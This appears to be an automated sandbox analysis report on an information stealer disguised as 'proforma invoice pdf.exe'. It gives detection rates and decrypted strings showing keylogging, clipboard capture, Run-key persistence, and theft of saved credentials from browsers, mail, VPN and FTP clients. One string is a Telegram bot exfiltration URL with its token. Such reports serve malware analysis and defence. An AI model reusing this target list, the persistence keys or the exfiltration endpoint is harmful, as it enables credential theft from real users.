Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Virustotal: Detection: 33%	Perma Link
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: proforma invoice pdf.exe	Virustotal: Detection: 33%			Perma Link
Source: proforma invoice pdf.exe	ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: proforma invoice pdf.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: /log.tmp
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: text/html
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: text/html
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <br>[
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: yyyy-MM-dd HH:mm:ss
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ]<br>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <br>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: text/html
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: application/zip
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Time:
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <br>User Name:
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <br>Computer Name:
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <br>OSFullName:
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <br>CPU:
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <br>RAM:
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <br>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: IP Address:
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <br>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <hr>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: New
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: IP Address:
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: true
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: https://api.ipify.org
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: true
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: true
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: true
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: false
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: true
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: true
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: https://api.telegram.org/bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: 1279485009
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: true
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: false
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: temp
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: bmBOz
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: bmBOz.exe
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: bmBOz
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: true
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: facebook
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: twitter
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: gmail
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: instagram
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: movie
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: skype
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: porn
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: hack
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: whatsapp
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: discord
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Type
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Run
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <br>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <hr>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <br>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <b>[
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ]</b> (
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: )<br>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {BACK}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {ALT+TAB}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {ALT+F4}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {TAB}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {ESC}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {Win}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {CAPSLOCK}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {KEYUP}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {KEYDOWN}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {KEYLEFT}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {KEYRIGHT}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {DEL}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {END}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {HOME}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {Insert}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {NumLock}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {PageDown}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {PageUp}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {ENTER}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {F1}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {F2}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {F3}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {F4}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {F5}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {F6}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {F7}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {F8}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {F9}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {F10}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {F11}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {F12}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: control
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {CTRL}
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: &
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: >
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: "
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <br><hr>Copied Text: <br>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <hr>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: logins
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: IE/Edge
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Windows Secure Note
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Windows Web Password Credential
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Windows Credential Picker Protector
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Web Credentials
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Windows Credentials
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Windows Domain Certificate Credential
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Windows Domain Password Credential
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Windows Extended Credential
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: 00000000-0000-0000-0000-000000000000
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SchemaId
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: pResourceElement
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: pPackageSid
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: IE/Edge
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: UC Browser
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: UCBrowser\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Login Data
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: journal
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: wow_logins
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Safari for Windows
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <array>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <dict>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <string>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: </string>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <string>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: </string>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <data>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: </data>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: -convert xml1 -s -o "
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \fixed_keychain.xml"
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Microsoft\Protect\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: credential
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: QQ Browser
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Tencent\QQBrowser\User Data
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Default\EncryptedStorage
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Profile
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \EncryptedStorage
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: entries
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: category
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: str3
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: str2
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: blob0
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: password_value
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: IncrediMail
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: PopPassword
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\IncrediMail\Identities\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Accounts_New
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: PopPassword
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SmtpServer
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: EmailAddress
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Eudora
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: current
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Settings
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SavePasswordText
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Settings
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ReturnAddress
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Falkon Browser
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \falkon\profiles\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: profiles.ini
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: profiles.ini
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \browsedata.db
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: autofill
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ClawsMail
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Claws-mail
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \clawsrc
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \clawsrc
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: passkey0
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: master_passphrase_salt=(.+)
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \accountrc
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: smtp_server
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: address
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: account
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \passwordstorerc
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: {(.),(.)}(.*)
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Flock Browser
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: APPDATA
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Flock\Browser\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: signons3.txt
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: DynDns
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Dyn\Updater\config.dyndns
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: username=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: password=
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: https://account.dyn.com/
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: t6KzXhCh
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Dyn\Updater\daemon.cfg
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: global
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: accounts
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: account.
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: username
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: account.
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: name
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: APPDATA
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Psi\profiles
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: APPDATA
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Psi+\profiles
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: OpenVPN
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: username
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: auth-data
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: entropy
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: USERPROFILE
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \OpenVPN\config\
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: remote
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: remote
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: NordVPN
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: NordVPN
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: NordVpn.exe*
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: user.config
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: //setting[@name='Username']/value
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: NordVPN
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: %ProgramW6432%
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Private Internet Access\data
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \Private Internet Access\data
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \account.json
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ."username":"(.?)"
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ."password":"(.?)"
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: privateinternetaccess.com
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: FileZilla
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: APPDATA
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: APPDATA
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <Server>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <Host>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <Host>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: </Host>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <Port>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: </Port>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <User>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <User>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: </User>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: </Pass>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <Pass>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: </Pass>
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: CoreFTP
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: User
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Host
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Port
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: hdfzpysvpzimorhk
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: WinSCP
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: HostName
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: UserName
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Password
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: PublicKeyFile
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: PortNumber
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: WinSCP
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: ABCDEF
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Flash FXP
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: port
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: user
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: pass
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: quick.dat
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: Sites.dat
Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	String decryptor: \FlashFXP\
